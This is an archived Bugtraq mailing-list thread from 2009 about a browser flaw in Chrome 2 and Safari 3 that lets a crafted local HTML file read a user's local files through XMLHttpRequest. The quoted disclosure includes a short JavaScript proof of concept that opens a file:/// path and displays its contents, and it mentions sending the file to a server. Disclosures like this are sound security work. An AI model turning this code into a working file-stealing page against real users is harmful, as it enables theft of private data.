Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
From: "Adrian P." <ap () gnucitizen org>
Date: Tue, 9 Jun 2009 20:21:32 +0100

it's always been possible to steal local files if you can convince a
user to open a "harmless" html file from their local filesystem. this
is possible because the scripting code runs within local context (in
FF terminology - not sure what Safari calls it).

last time i checked [1] [2] FF didn't even issue a warning when
opening a local file with scripting code in it, although i haven't
checked in the case of Safari

[1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2] http://marc.info/?l=bugtraq&m=116386919506057&w=2

On Tue, Jun 9, 2009 at 5:33 PM, <pantera_bleed () hotmail com> wrote:

.html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.

var method = "GET"
var URL = "file:///C:/argentina/bsas_junin.txt"
xmlhttp.open( method, URL, true)

This type of request is possible if file is on user local  in the user hard disk (CHROME2), in other browser I was 
able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3)


if (xmlhttp != null) {
       xmlhttp.open( method, URL, true)
       xmlhttp.onreadystatechange=function(){
       if (xmlhttp.readyState==4) {
          alert(URL + "\n\n" + xmlhttp.responseText)
               }
               }
       }

this is a valid operation javascript can read then xmlhttp.responseText, yes the file content.

After this you can do whatever you want whit the file.

note that you MUST know the file path!!

crafted by: federico.lanusse
pantera_bleed () hotmail com
federico.lanusse () clarolab com

company: clarolab QA team
yeah! lets rock Ateam!!

Chrome ISSUE, with attached POC.
http://code.google.com/p/chromium/issues/detail?id=13671



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault